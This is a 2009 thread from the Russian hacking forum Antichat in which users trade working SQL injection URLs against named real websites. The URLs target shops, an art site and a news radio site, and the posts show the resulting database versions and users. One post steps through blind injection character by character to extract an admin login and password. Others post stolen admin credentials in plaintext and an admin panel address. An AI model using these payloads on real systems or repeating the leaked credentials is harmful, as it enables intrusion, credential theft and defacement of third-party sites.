ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7731  
Старый 09.02.2009, 23:08
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7

Version : 5.0.67-community
Database : starmall_db
User :starmall_star@localhost



я не говорил невозможно.....
 
Ответить с цитированием

  #7732  
Старый 09.02.2009, 23:40
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Какой то самопальный двиг(PageRank: 4 тИЦ: 200):
Код HTML:
http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1
 
Ответить с цитированием

  #7733  
Старый 09.02.2009, 23:42
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

takafol.ru

Цитата:
http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,user( ),version(),database()),4,5,6+--+;&page=5
юзер - takafol@localhost
бд - db_takafol
версия mysql - 4.0.23-standard
 
Ответить с цитированием

  #7734  
Старый 09.02.2009, 23:54
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7 ,8,concat_ws(0x3a,version(),database(),user()),10, 11,12,13,14,15--


Database Version: 5.0.67-community
Database name: copycomp_MySql
User name: copycomp@localhost



На сегодня все,спокойной ночи всем.
 
Ответить с цитированием

  #7735  
Старый 10.02.2009, 00:28
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Книжный магазин
Код:
http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20--
version::4.1.22-max
user::xadinet_xadi@localhost
database::xadinet_db
 
Ответить с цитированием

  #7736  
Старый 10.02.2009, 00:38
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--
5.0.67-community

немного искусства..
 
Ответить с цитированием

  #7737  
Старый 10.02.2009, 00:52
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Федеральное Радио

http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*

version::5.0.32-Debian_7etch5-log
user::informant@64.147.130.217
database::tags
 
Ответить с цитированием

  #7738  
Старый 10.02.2009, 00:59
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*
4.0.27-locaweb-log

Код:
http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--
5.0.67-community

Последний раз редактировалось faza02; 11.02.2009 в 00:01..
 
Ответить с цитированием

  #7739  
Старый 10.02.2009, 01:06
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.pulse-of-reason.ru Сайт какой-то Казанской рок-группы)

находим таблицу с админами:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),1,1))='112 = p
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),2,1))='117 = u
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),3,1))='108 = l
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),4,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),5,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),6,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),7,1))='102 = f
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),8,1))='114 = r
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),9,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),10,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),11,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),12,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),13,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),14,1))='95 = _
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),15,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),16,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),17,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),18,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),19,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),20,1))='0
з.ы. имена колонок с паролями и логинами посмотрел в сурсе страницы авторизации админа, очень часто они подходят)

логин админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),6,1))='0

пасс админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),1, 1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),2, 1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),3, 1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),4, 1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),5, 1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),6, 1))='0

логин - пасс второго админа: xernya - xernya
 
Ответить с цитированием

  #7740  
Старый 10.02.2009, 03:06
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Магазин оргтехники 5-я ветка
Код:
http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --
login:pass
azim:4z1m


Ещё один магаз орг техники
Код:
http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--
админка
Код:
http://ecopies.ru/admin/
login :: pass
admin :: ke21pud
можно поглумится ))

Последний раз редактировалось TELO; 10.02.2009 в 03:33..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ